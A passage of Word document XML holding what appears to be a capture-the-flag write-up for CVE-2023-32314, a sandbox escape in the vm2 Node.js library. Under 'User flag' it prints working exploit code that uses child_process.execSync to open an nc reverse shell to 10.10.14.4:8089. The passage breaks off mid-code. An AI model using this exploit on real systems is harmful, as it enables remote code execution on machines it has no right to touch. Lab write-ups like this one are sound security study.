    <w:p w14:paraId="7BDD63B1" w14:textId="0F312EC8" w:rsidR="00763E93" w:rsidRPr="009A2540" w:rsidRDefault="00763E93" w:rsidP="00763E93">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc157155784"/>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2</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Application library</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="322A244D" w14:textId="579EA2EE" w:rsidR="0056210F" w:rsidRPr="009A2540" w:rsidRDefault="0056210F" w:rsidP="00476343">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I did </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a research</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on Internet and I found a possible exploit to attack the </w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vm2</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> library. This exploit is relative to </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="009A2540">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:b/>
            <w:bCs/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>CVE-2023-32314</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This vulnerability is related to using</w:t>
      </w:r>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>err.name.toString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ErrorPrototypeToString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> function, which is called from the host context. The issue arises because the error argument of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>prepareStackTrace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> function is not handled properly by handlers defined in </w:t>
      </w:r>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vm2/lib/bridge.js</w:t>
      </w:r>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is due to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>prepareStackTrace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> being called directly by the V8 engine without going through proxy handlers. The behavior of a proxy object's </w:t>
      </w:r>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[[Call]]</w:t>
      </w:r>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> internal method is relevant. It points to the creation of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>argArray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the host context and the host object being passed to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>apply(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">target, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thiz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This suggests that accessing the Function constructor of the host context is possible, which could be a security concern in the vulnerable code.</w:t>
      </w:r>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This vm2 vulnerability is related to the mishandling of the error argument in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>prepareStackTrace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00476343" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> function, potentially allowing unauthorized access to the Function constructor in the host context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D6F382" w14:textId="5771962C" w:rsidR="00476343" w:rsidRPr="009A2540" w:rsidRDefault="00476343" w:rsidP="00476343">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc157155771"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>User flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="41E6A3B6" w14:textId="4D15D99E" w:rsidR="00476343" w:rsidRPr="009A2540" w:rsidRDefault="00476343" w:rsidP="00476343">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>By executing an exploit relative to this CVE</w:t>
      </w:r>
      <w:r w:rsidR="00B2247E" w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the following code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A609084"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const </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>{ VM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> } = require("vm2");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5594EEA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const </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>vm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> = new </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>VM(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D940FD9"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p>
    <w:p w14:paraId="4430E4DA"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const code = `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C8640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const err = new </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Error(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB30CE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err.name = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C03E7D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toString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: new </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Proxy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>() =&gt; "", {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE30E9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gramStart"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>apply(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">target, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>thiz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB3495C"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const process = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>args.constructor</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.constructor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>("return process")();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1212497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throw </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>process.mainModule.require</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>child_process</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>").</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>execSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>("rm -f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 xml:space="preserve">/a; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>mkfifo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 xml:space="preserve">/a; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.10.14.4 8089 0&lt;/</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 /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;/</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2&gt;&amp;1; rm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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>toString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6298CADE"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1AAB9DC9"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44D0FA84"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2027734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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247DE553"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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>err.stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD37108"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 catch (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00763E93">
        <w:rPr>
